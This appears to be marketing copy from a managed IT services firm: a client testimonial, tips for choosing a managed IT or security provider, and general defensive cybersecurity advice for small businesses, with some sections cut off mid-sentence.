Our IT Consultants successfully lowered costs for Sunair by recommending and implementing the right technologies. Jim raves about our team: “Hammett acts as an extension of Sunair, not as an independent contractor trying to extract revenue. They help us keep costs low while keeping our customers happy. They also treat our ‘wallet’ as their own – the amount we spend on Hammett’s services is a fraction of what we would spend with other companies”.

Sunair Awnings and Solar Screens experienced what we do for all our clients. We work to cut costs while delivering exemplary service that is far above what other IT companies provide. Hammett Technologies will ensure you realize the true value of your information technology.

Call us at (443) 216-9999 or send us an email: info@hammett-tech.com. We’ll address your unique IT requirements while saving you money.
There are plenty of options when it comes to finding a Managed IT Services provider for your business – how can you tell which is the right choice for you?

These days, business owners are searching for every advantage to put their company on top. With so much competition out there, just a few small issues here and there can result in costly slow-downs to daily work. One of these resides in your IT department. Nothing is more frustrating than broken computers, slow internet service, and expensive service calls. Things like this can ruin your week and take a huge chunk out of the budget.

Though there’s no way to stop computer and network problems from happening, there are ways to minimize your exposure. For small and mid-sized businesses, the solution is Managed IT Services. With Managed IT Services, you can forget about setting up an expensive Server Room and hiring a bunch of highly trained IT people. You’ll probably only need a handful of IT people on staff to handle simple issues that crop up in day-to-day business.

The problem comes with the fact that there are so many IT service providers these days and so it can be difficult to find the one that works best for your company. To help, check out these five timely tips to help you find the right IT service provider so you can get back to the job of running your company.

Tip One: The Budget

Although having the best IT support for your company is important, sometimes managed service providers are keen on trying to sell you expensive services that you really don’t need. To avoid this scenario, sit down with your on-staff IT people and talk about exactly what services your company needs to stay up and running. Speak to your accountant and make sure about the monthly amount that will fit comfortably into your budget. All companies are nervous about data breaches these days; they can be expensive and stressful. However, don’t let that push you to buy over-priced services that you really can’t afford and don’t need.
For some companies, hiring a consultant to advise you is a good solution.

Tip Two: Understand Your Contract

Too many business owners get locked into long-term contracts that they can’t afford. Make sure you understand exactly what your contract includes. How often can you call for service? Some companies allow unlimited service calls for just a few extra dollars per month. This can be a good way to go if your computer equipment is getting old and might break down more often than new equipment.

Another issue is whether the contract includes regular updates to software and hardware. One of the biggest issues that companies face is the evolution of technology. Every year, technological capabilities develop at phenomenal rates; it’s hard to keep up. There are new devices, gadgets and social media sites that demand faster computers and networks. Managed IT Services should keep you up to date with the latest advances in business technology.

Tip Three: Stay Proactive

The whole point of Managed IT Services is that you have someone else to handle network and computer problems. As with all service providers, some are just better at their jobs than others. Make sure your Managed IT Services provider believes in staying proactive. Avoid providers who only come out when there’s a problem. You need a company that will stay on top of all the latest threats. One data breach could drive you into bankruptcy, so it’s important for your IT support provider to make sure your computers are ready for whatever may come.

Often, you can find out about things like this by reading online reviews of the company. Have they had any complaints filed against them? How long have they been in business? Don’t let a fast-talking salesman sell you on a company with two employees that just opened its doors. Find someone that has a great reputation and has been in business for years. You want to work with providers who will stand behind their services and won’t stop until you’re satisfied.
Tip Four: Is it Scalable?

Hopefully, your business is growing. What will happen if you need to add five new computers? IT services should grow as your company grows. You don’t need to understand all the intricacies of cost optimization, cloud services, and scalability, but you should know what it will cost in terms of money and time when your company begins to grow.

Ask intelligent questions about colocation and virtual infrastructures. Many business owners are not well versed on these topics but your company’s IT professionals should be. You need IT people you can count on; not people who try to dazzle you with big words. Your on-staff IT team should be working proactively each day to ensure ongoing network services and a sound infrastructure. Hire the best people you can afford and expect them to do their jobs.

Tip Five: Ask the Right Questions

In the world of Information Technology, there’s quite a bit that the average business owner doesn’t know about. For instance, will the Managed IT Services provider perform regular security updates and patch management? These are both crucial to preventing cyber breaches. Will they perform network monitoring and send alerts when something looks out of order?

A new service provider should begin your professional relationship by performing a vulnerability and risk assessment. This will tell you whether your software and hardware are up to par. Is your equipment set up to handle the massive number of new cyber threats that are hurled at businesses each year?

How many times have you waited all day for a service provider to show up? This is stressful and costly for any business owner. Ask if the IT provider has a guaranteed response time. It can also be very helpful to have 24/7 Helpdesk support. Be sure this is included in your contract. Many managed IT providers also offer additional services that can be
Learn the seven key questions every business should ask when deciding on which Managed Security Service Provider to hire.

A Managed Security Service Provider is an extension of your IT services department that focuses solely on the security of your company. The services that a Managed Security Service Provider provides range on the network security management spectrum from virus and spam blocking, to intrusion detection, firewalls, and virtual private network (VPN) management. Additionally, some Managed Security Service Providers offer other features such as system changes, modifications, and upgrades.

When your company’s security is on the line, it is incredibly important to fully evaluate your options for a Managed Security Service Provider. To help make this decision, here are seven questions every business should ask when deciding on which Managed Security Service Provider to hire.

What Is Their Reputation?

Checking the reputation and reviews of a business doesn’t apply only to restaurants; it is also essential when hiring a Managed Security Service Provider. Roger Smith, Amazon #1 Best Selling Author, Experienced Cybercrime and CyberSecurity Expert, Speaker, and Trainer, explains that reputation is critical in deciding whether to hire a Managed Security Service Provider. Smith goes on to further clarify that “Making a bad decision or deciding on one provider based solely on cost can cripple your business”.

What Can The Managed Security Service Provider Do For Your Business?

Before you hire a Managed Security Service Provider, you need to know what they do, and what they can do for your business. You can evaluate their features by looking into four key categories: Technology, Management, Adaptability, and Compliance. A Managed Security Service Provider typically offers businesses technology such as firewalls, wireless solutions, VPNs and patch management.
Managed Security Service Providers are responsible for managing policies, risks, procedures, processes, auditing, reports, training, and education. Managed Security Service Providers should be able to adapt to your business needs under any circumstance. For example, Managed Security Service Providers should offer disaster recovery, business continuity, and backup storage and protection as well. Knowing each feature and its importance to your company allows you to better evaluate which Managed Security Service Provider will work best for you.

John Penland, the founder of InfoTech, states that “In order to provide exceptional value, a provider must first understand their customer’s business model. This helps providers develop a rock-solid solution that can create a long-lasting, happy customer”.

Do They Have The Expertise?

Not all Managed Security Service Providers are the same. While they might all roughly do the same work, it doesn’t mean that they will all fit well with your company. For example, a Managed Security Service Provider that works for a healthcare business might not be as successful for an accounting business. There are differences in timelines, terms, and expertise that can affect their successful integration into your business.

Ian Trump, an ITIL Certified Information Technology Consultant with 20 years’ experience, explains that “When evaluating the Managed Security Service Provider, you need to know whether they have some experience in your particular vertical. A Managed Security Service Provider that specializes in healthcare services may not be a good fit for a logistics and transport or manufacturing company”.

Do They Have The Capability?

You need to be sure of what you need from your Managed Security Service Provider, then cross-reference that to ensure that they are capable of providing those services to you.
Brian Laing, an IT Security innovator from Lastline, states that “The key to evaluating a Managed Security Service Provider is to first codify your requirements”. Splitting these into different requirements not only simplifies deciding which Managed Security Service Provider might be better, but it can also completely remove a vendor from the selection process. This will save your business valuable money and time.

What Are They Going To Change To Make Your Life Easier?

Hiring a Managed Security Service Provider should make running your business smoother. When hiring and evaluating your Managed Security Service Provider, ensure that you are firm on nonnegotiable expectations of service. Ian Trump reiterates the importance of a mutually beneficial relationship by explaining that “When contracting the services, I would approach negotiations as a partnership and use language which provides mutual benefit, measurable deliverables, service level agreements (on both sides), and dispute resolution mechanisms”.

What Benefits Are You Going To Get Out Of It If You Partner With Them?

It is essential to create a specific service level agreement with your chosen Managed Security Service Provider. This ensures that all parties involved understand the requirements on both sides – recognizing this as a mutual relationship is key. They are there to protect your company, data, customers, and staff and you are there to pay them. Just as you wouldn’t hire an employee to sit on Facebook all day, you shouldn’t hire a Managed Security Service Provider that won’t carry their own weight.

How Much Will It Cost?

Outsourcing to a Managed Security Service Provider can save your business 60-75%. Managed Security Service Providers cost on average about $75,000 a year. While this sounds hefty, you can compare it to the cost of a small IT department doing the same amount of work.
Three IT staff, with a salary of $72,000 annually plus the cost of cybersecurity software, hardware, and equipment can easily run you upwards of $300,000. Additionally, the use of a Managed Security Service Provider saves you money by providing your business with critical cyber protection 24 hours a day, seven days a week, 365 days a year. The cost of this coverage with traditional employees would be far higher. It is important to understand all aspects of your contract and to thoroughly investigate the financial aspects of it.

Protecting your investment in your business is no different when hiring a Managed Security Service Provider. Due diligence is important during the hiring and evaluating stage, as it provides your business peace of mind and ensures that your Managed Security Service Provider will continue to work as
Your small business is at risk. There’s no way to sugarcoat it and no way to say it any more plainly. Every day there are criminals targeting businesses. Why? Because they want your money, they want your private data, or they just want to cause trouble for you. It doesn’t matter what they want. The scary thing is that they can do immense damage to your company in a very short window of time. If ransomware takes control of and encrypts your data, your only recourse is to pay the criminals.

But what if you could get ahead of the criminals and enact nine strategies that will enhance your company’s cybersecurity posture? It’s time to take a stand and act BEFORE the bad guys do their damage. These nine cybersecurity tips will help your business be proactive regarding your IT security.

#1 – Strengthen Your Payment Gateway With Card Best Practices

Your bank and credit card issuers can help you tremendously in the area of IT security for credit and debit cards. They will help you by supplying many of the tools that you need to validate cards and ensure that the cards you process haven’t been compromised by fraud.

Part of the credit/debit card cybersecurity best practices is the practice of isolation. By putting your payment systems on a separate computer – even a separate internet connection – from the computers you use for internet use, you lower the risk.

Another best practice that revolves around keeping up with cybersecurity technology is the move from magnetic strip readers to chip card or EMV readers. These new EMV readers are now the industry standard, and even small businesses need to comply with this new payment security measure.

#2 – Back Up Everything

Your business cannot operate effectively without access to your data. If you don’t back it up, your data may not be there for you when you need it the most. A busy office creates thousands of files each day, and the secure backup of these files needs to be a part of your company’s cybersecurity strategy.
Backups should be made at least daily and mirrored in the cloud or an offsite server. Backup should be overseen by an IT support and IT security professional. Companies like us have the cybersecurity experts that are proficient in handling automatic, secure data backup and recovery for companies large and small.

#3 – Get Your Physical Access Points Secured

If the bad guys – even bad employees – can just walk into any office in the building and access computers, laptops, tablets, or smartphones, you’re not even close to having bulletproof cybersecurity. You need to ensure that your devices are protected by two-factor authentication and that you use door locks and more sophisticated electronic access systems to prevent entry by unauthorized individuals. Everyone in the company should have their own secure passwords, and admin privileges should only be given to the actual network administrator.

#4 – Have Structured Procedures In Place For Mobile Devices

The mobile devices that your company employees use can present some unique problems when it comes to cybersecurity. IT security experts routinely point to unsecured mobile devices as the vulnerability used by cyber-criminals to gain access to company networks. Make sure your employees use passwords to protect their smartphones and tablets. Contact an IT security professional – like our cybersecurity experts – to help you with data encryption, secure file synchronization, and secure network access. Cybersecurity experts can help you protect your data with remote wipe capability if your phone is lost or stolen.

#5 – Secure Your Entire Website

Everyone knows that their sign up forms and check out pages need to be secure, but what about the rest of your company’s website? We’ve all had the experience of going to a business site, only to find that it has been hacked and taken over by malicious cyber-criminals. Don’t let it happen to you.
- Implement antivirus and anti-spyware software on your computers
- Do all the updates, upgrades, and patches issued by your operating system developer
- Bring in an IT security professional to do a vulnerability assessment on a regular basis

#6 – Lock Down Your Networks

Your network connects all your devices, the internet, and your peripheral devices (like printers). Each device is a point at which a criminal could gain access. Here are some tips.

- Your internet connection isn’t safe unless you are utilizing a monitored firewall and leveraging the power of encryption.
- Make sure to hide your company WiFi and use controlled access to customer WiFi.
- Password protect your router.
- Disconnect any WiFi enabled devices that you don’t regularly use and security check.

#7 – Put Policies in Place to Secure Private Data

Your employees should know what the IT security policies of the company are and how to deal with private information. But they won’t unless you specifically take the time and invest in cybersecurity awareness training. Once you have done the training, they should be aware of and be held responsible for following IT security protocols.

#8 – Employees Are Your First Line Of Defense Against Cyber-Criminals

Employees want to help you secure your business against cyber-crime, but often don’t know that they are letting the bad guys in the front door. By training your employees on topics like phishing, social engineering, ransomware, spyware, and adware, you can drastically reduce your risk. Following that training, employ a cybersecurity professional to run tests on your employees’ ability to spot these scams and intrusion attempts.

#9 – Leverage Strong Passwords And Multi-Factor Identification

Your staff should be instructed on what makes for a good password. Better yet, hire an IT security professional to set up multi-factor identification and single sign-on strategies for your business.
These cybersecurity tactics can help your employees be more efficient while enabling a higher degree of security for your company. Looking for IT security experts to help your business avoid intrusions, disruptions, and costly downtime?